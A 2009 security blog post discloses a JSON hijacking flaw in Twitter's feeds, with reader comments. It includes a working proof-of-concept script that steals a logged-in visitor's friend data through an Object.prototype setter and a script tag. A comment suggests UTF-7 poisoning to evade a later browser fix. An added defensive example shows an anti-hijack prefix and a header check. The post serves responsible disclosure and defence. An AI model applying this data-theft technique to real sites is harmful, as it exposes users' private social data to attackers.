I know what your friends did last summer

I did report this to Twitter a few weeks ago, but now that Chris Heilmann has let the cat out of the bag I’ll post my repro now. Basically Twitter’s JSON security is leaking data: the JSON feeds that are publicly available shouldn’t be, IMO, or should at least be protected using known methods.

So if you use Twitter, a web site can know who you are and who your friends are. Spammers could use this data to automate targeted spamming attacks or maybe automated social engineering; you’re more likely to open an email attachment from your friends, right?

The attack works by including the JSON data using a script tag on any web site; using setters you can read the data of the JSON feed in every browser except IE (in my testing).

<script>
// Setter on Object.prototype: when the feed is evaluated as a script, every object
// literal that assigns a "user" property triggers this and exposes its fields
Object.prototype.__defineSetter__('user',function(obj){for(var i in obj) {alert(i + '=' + obj[i]);} });
</script>
<script defer="defer" src="https://twitter.com/statuses/friends_timeline/"></script>

Originally I thought it was a bug in Firefox, which is why I used Object.prototype and not simply Object, but then I found a post by Joe Walker which uses a far better technique to grab all the data.

Here is the proof of concept to prove I do know what your friends did last summer:
twitter json hack
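As an added example that is not part of the original post, this shows the defensive side of the attack above: the "known methods" a JSON endpoint can use so that including it via a script tag yields nothing. The feed, the prefix and the header check are all constructed for illustration; a plain JSON array body parses as a valid script (which is what the setter trick relies on), while a prefixed body is a syntax error yet still trivial for a same-origin XHR client to unwrap.

```javascript
// Constructed sample of a friends-timeline style feed (not real Twitter data).
const feed = [
  { id: 1, text: 'hello', user: { screen_name: 'alice', name: 'Alice' } },
  { id: 2, text: 'world', user: { screen_name: 'bob', name: 'Bob' } },
];

// Unparseable prefix (assumed convention): makes the body a SyntaxError when
// loaded with <script src=...>, so no object literal is ever evaluated and no
// prototype setter fires. XHR clients simply strip it before parsing.
const ANTI_HIJACK_PREFIX = ")]}',\n";

// Server side: serialize the feed behind the prefix.
function encodeProtectedJson(data) {
  return ANTI_HIJACK_PREFIX + JSON.stringify(data);
}

// Client side (same-origin XHR): verify and strip the prefix, then use
// JSON.parse rather than eval so no code path executes the body.
function decodeProtectedJson(body) {
  if (!body.startsWith(ANTI_HIJACK_PREFIX)) {
    throw new Error('missing anti-hijack prefix; refusing to parse');
  }
  return JSON.parse(body.slice(ANTI_HIJACK_PREFIX.length));
}

// Check: would this response body run if included as a script?
// Function() parses the body without executing it.
function isParseableAsScript(body) {
  try {
    new Function(body);
    return true;
  } catch (e) {
    if (e instanceof SyntaxError) return false;
    throw e;
  }
}

// Second known method (assumed header name): a script tag cannot add custom
// request headers, so requiring one excludes cross-site <script> inclusion.
function isJsonRequestAllowed(headers) {
  return headers['x-requested-with'] === 'XMLHttpRequest';
}
```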

Comments 12

  1. thornmaker wrote:

    how about document.write() instead of alert() for your PoC? :)

    Posted 07 Jan 2009 at 5:23 pm
  2. Gareth Heyes wrote:

    LOL nah I like annoying people :) plus I can’t be bothered changing it now

    Posted 07 Jan 2009 at 5:36 pm
  3. Gareth Heyes wrote:

    * Note: You need to be logged into Twitter using https in order for the PoC to work correctly

    Posted 07 Jan 2009 at 5:38 pm
  4. Gareth Heyes wrote:

    Twitter has now fixed the problem whoo hoo

    Posted 13 Jan 2009 at 9:19 am
  5. Giorgio Maone wrote:

    Get NoScript 1.8.8.95 from http://noscript.net/getit#devel :)

    http://hackademix.net/2009/01/13/you-dont-know-what-my-twitter-leaks/

    http://hackademix.net/2009/01/13/twitter-json-hijacking-updates/

    Posted 13 Jan 2009 at 10:34 am
  6. Pete wrote:

    Hi Gareth
    I found your name and information on the Security Planet website. Can you help me, or do you know someone who can help me, to crack a gmail password?
    Thanks
    Pete

    Posted 26 Feb 2009 at 9:29 am
  7. Gareth Heyes wrote:

    @Pete

    I think you misunderstood what I actually do. I’m a security researcher.

    Posted 26 Feb 2009 at 9:52 am
  8. Frank Polenose wrote:

    I had to have a chuckle at Pete’s comment! Cheered me right up!

    Posted 21 May 2009 at 4:23 pm
  9. carstein wrote:

    It seems that doesn’t work in ff 3.5 because setters are ignored when initializing object. Any ideas how to evade that?

    Posted 21 Dec 2009 at 11:45 am
  10. Gareth Heyes wrote:

    @carstein

    UTF-7 should work until they fix it

    Posted 21 Dec 2009 at 1:13 pm
  11. carstein wrote:

    @Gareth:
    I don’t think I follow you. UTF-7 where?

    The problem is that in FF3 you can define a setter for an Object.prototype which gets invoked when you receive a JSON object (as JS, so Object() is being initialized). However, due to tweaks in FF3.5, setters are only called when the value is being set on an existing object, but not during initialization (so it spoils all the joy of JSON hijack).

    Posted 21 Dec 2009 at 1:42 pm
  12. Gareth Heyes wrote:

    @carstein

    I do follow honest but if you used poisoned UTF-7 data with a json request then you can get most of the data by manipulating the javascript. See my CSP hack.

    http://www.thespanner.co.uk/2009/11/23/bypassing-csp-for-fun-no-profit/

    Posted 22 Dec 2009 at 10:44 am
